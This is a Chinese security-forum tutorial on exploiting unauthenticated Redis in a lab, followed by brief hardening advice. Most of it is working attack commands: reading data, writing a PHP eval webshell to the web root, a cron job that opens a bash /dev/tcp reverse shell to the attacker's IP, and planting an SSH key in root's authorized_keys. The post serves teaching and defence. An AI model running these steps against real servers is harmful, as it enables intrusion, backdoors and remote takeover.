用户
搜索
  • TA的每日心情
    开心
    2019-5-21 12:23
  • 签到天数: 9 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-脚本小子

    Rank: 2

    1

    主题

    9

    帖子

    196

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-9-28
    发表于 2020-10-13 23:52:23 14308

    Redis未授权访问漏洞

    1、Redis是什么?

    Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。<br />它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。<br />
    <br />相比于其他数据库类型,Redis具备的特点是:<br />C/S通讯模型<br />单进程单线程模型<br />丰富的数据类型<br />操作具有原子性<br />持久化<br />高并发读写<br />支持lua脚本

    2、环境搭建和基本命令

    安装环境:

    下载
    wget http://download.redis.io/releases/redis-4.0.11.tar.gz
    
    解压
    tar -zxvf redis-4.0.11.tar.gz
    
    切换目录
    cd redis-4.0.11
    
    编译
    make & make install
    
    运行redis
    cp redis-benchmark redis-cli redis-server /usr/bin/
    

    这里可能会出现两个报错或配置问题,解决方法参考:<br />https://blog.csdn.net/weixin_30572613/article/details/94879855<br />https://blog.csdn.net/rongDang/article/details/90601033<br />https://www.cnblogs.com/richerdyoung/p/8066373.html<br />1)启动 redis 服务器,打开终端并输入命令 redis-cli,该命令会连接本地的 redis 服务。

    $ redis-cli
    redis 127.0.0.1:6379>
    redis 127.0.0.1:6379> PING
    PONG

    在以上实例中我们连接到本地的 redis 服务并执行 PING 命令,该命令用于检测 redis 服务是否启动。<br />20在远程服务上执行命令<br />如果需要在远程 redis 服务上执行命令,同样我们使用的也是 redis-cli 命令。

    $ redis-cli -h host -p port -a password

    3、漏洞

    kali:192.168.1.111<br />redis漏洞服务器:192.168.1.216

    1)未授权访问漏洞

    需要先在本地开启redis,然后远程登录有漏洞的redis
    redis-cli -h 192.168.1.216
    查看敏感信息:
    redis 192.168.1.216:6379> info
    redis 192.168.1.216:6379> keys *

    2)写入webshell

    (需要知道web路径,这里假设为apache默认路径/var/www/html)

    192.168.1.216:6379> config set dir /var/www/html
    OK
    192.168.1.216:6379> set xxx "\n\n\n<?php @eval($_POST['z']);?>\n\n\n"
    OK
    192.168.1.216:6379> config set dbfilename webshell.php
    OK
    192.168.1.216:6379> save
    OK
    192.168.1.216:6379> 

    然后蚁剑连接:<br />webshell.png<br />

    3)crontab里写定时任务,反弹shell

    kali监听:nc -lvvp 4444
    redis:
    192.168.1.216:6379> set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.111/4444 0>&1\n\n"
    OK
    192.168.1.216:6379> config set dir /var/spool/cron
    OK
    192.168.1.216:6379> config set dbfilename root
    OK
    192.168.1.216:6379> save
    OK
    192.168.1.216:6379> 

    等待1分钟后,kali收到了返回的shell<br />cron.png<br />注意这里需要开启redis服务器上的crond服务

    # service crond status
    crond is stopped
    # service crond start
    Starting crond

    4)SSH免密登录redis服务器

    这里需要redis服务开启了ssh服务<br />首先先在kali里生成ssh公钥和私钥,将公钥保存到key.txt,并且保存在redis服务器的缓存中

    kali:
    root@kali:/root/.ssh#ssh-keygen-t rsa
    root@kali:/usr/local/redis# cat /root/.ssh/key.txt | redis-cli -h 192.168.1.216 -x set xxx
    OK
    root@kali:/usr/local/redis# redis-cli -h 192.168.1.216
    192.168.1.216:6379> config set dir /root/.ssh
    OK
    192.168.1.216:6379> config set dbfilename authorized_keys
    OK
    192.168.1.216:6379> save
    OK
    192.168.1.216:6379> 

    先看一下没有save前的ssh登录,需要密码:<br />ssh1.png<br />save之后不需要密码即可登录:<br />ssh2.png

    4、防范方法

    到redis安装目录下,配置redis.conf文件:
    1、默认只对本地开放
    bind 127.0.0.1
    2、添加登陆密码
    修改 redis.conf 文件,添加
    requirepass mypasswd
    3、在需要对外开放的时候修改默认端口(端口不重复就可以)
    4、以低权限运行 Redis 服务(重启redis才能生效)
    为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆
    5、最后还可以配合iptables限制开放

    学习了
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册